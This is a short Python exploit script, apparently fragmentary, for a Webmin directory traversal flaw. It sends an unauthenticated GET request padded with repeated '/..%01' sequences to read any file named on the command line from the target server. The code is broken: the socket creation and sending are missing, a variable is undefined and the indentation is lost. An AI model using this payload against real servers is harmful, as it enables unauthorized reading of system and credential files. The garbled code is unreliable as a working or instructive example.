# This script was build off of the concept of the metasploit auxiliary plugin for displaying files on Webmin due to a directory traversal vulnerability. This allows you to put in place the file that you would like to pull and retrieve it quicker than if you are in maetasploit. You can also redirect the output to a file.
import os, sys
if len(sys.argv) > 1:
# Found that the %01 can be substituted for other characters.
url = "/unauthenticated/" + "/..%01"*40 + sys.argv
httpRequest = "GET " + url + " HTTP/1.1\n"
httpRequest += "Host: test.com\n\n"
for i in range(1,15):
data = s.recv(1024)
print "Usage: ./displayFile.py file"
print "The file in this case is any file on the file system you can pull.\n\n"